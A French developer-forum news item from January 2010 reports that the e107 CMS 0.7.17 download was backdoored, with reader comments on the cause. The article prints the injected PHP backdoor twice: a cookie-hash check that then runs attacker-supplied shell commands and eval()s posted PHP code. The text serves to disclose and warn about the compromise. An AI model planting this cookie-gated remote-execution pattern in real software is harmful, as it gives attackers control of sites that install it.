La dernière version du SGC e107 est backdoorée
Son lien de téléchargement est compromis
Le 2010-01-27 04:26:54, par Katleen Erna, Expert éminent sénior
La dernière version du SGC e107 est backdoorée, son lien de téléchargement est compromis
Certains d'entre vous utilisent peut être le système de gestion de contenu open source e107 pour créer ou gèrer des sites Internet. Disponible selon les termes de la licence GNU, ce SGC propose régulièrement de nouveaux téléchargements et mises à jour.
Il semblerait que sa dernière version, la 0.7.17 (qui vient de sortir), contienne un PHP Backdoor.
Un spécialiste en sécurité informatique ayant téléchargé le fichier a découvert l'entrée suivante à la ligne numéro 1876 de son code source :
(etc.)
Le lien de téléchargement ne serait donc pas fiable. L'internaute a averti e107, et recommande de ne plus télécharger le fichier en l'attente de leur réponse au problème.
Plus d'informations ici.
Certains d'entre vous utilisent peut être le système de gestion de contenu open source e107 pour créer ou gèrer des sites Internet. Disponible selon les termes de la licence GNU, ce SGC propose régulièrement de nouveaux téléchargements et mises à jour.
Il semblerait que sa dernière version, la 0.7.17 (qui vient de sortir), contienne un PHP Backdoor.
Un spécialiste en sécurité informatique ayant téléchargé le fichier a découvert l'entrée suivante à la ligne numéro 1876 de son code source :
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb"
...
if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}
elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}
...
if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}
elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}
Le lien de téléchargement ne serait donc pas fiable. L'internaute a averti e107, et recommande de ne plus télécharger le fichier en l'attente de leur réponse au problème.
Plus d'informations ici.
-
supertonicMembre avertiIl s'agit d'une faille venant de php donc ? Les sites utilisant php sont également concernés ?le 27/01/2010 à 9:55
-
trentonMembre expérimentéle 27/01/2010 à 10:02
-
ixpeMembre avertiOula...
Non il s agit d un code inseré par une personne malveillante dans les sources du cms...
Je l aime bien pourtant ce petit cms... Pas tres connu, je le pensais donc
plus ou moins a l abri des objectifs des pirates.le 27/01/2010 à 10:05 -
khayyam90RédacteurLa faille vient du code en téléchargement.
Quiconque installe cette nouvelle version permettra à un attaquant bien informé (qui aura connaissance du cookie à nommer access-admin) d'exécuter directement du code système ou php sur son site.
Une rapide recherche de base de données md5 ne m'a pas indiqué la valeur à positionner dans cookie.
Grosse grosse faille de sécurité.le 27/01/2010 à 10:06 -
bombsebMembre expérimentéil est sympas ce CMS mais il m'a pas l'air tres sécure...
je l'avais installé il y a un moment déja et on me l'avait déja hacké à l'époque...le 27/01/2010 à 11:04 -
kaymakMembre émériteEncore un bel exemple de propagation par les équipes de développement. Qui n'ont pas fait cela exprès.
C'est juste un des mecs ou des serveurs d'hébergement qui s'est fait infecté involontairement et qui par rebond a contaminé son projet : /
Donc le cms est toujours aussi secure (comme avant quoi pas plus, pas moins). et non, et triple non ce n'est pas une faille du moteur php, ou alors il faut bannir tous les langages de programmation.
Fin, faut tout de même patcher sa release pour ceux qui ont upgradé, plus encore ceux qui sont en serveur dédié, ou autre rps / vps.le 27/01/2010 à 12:56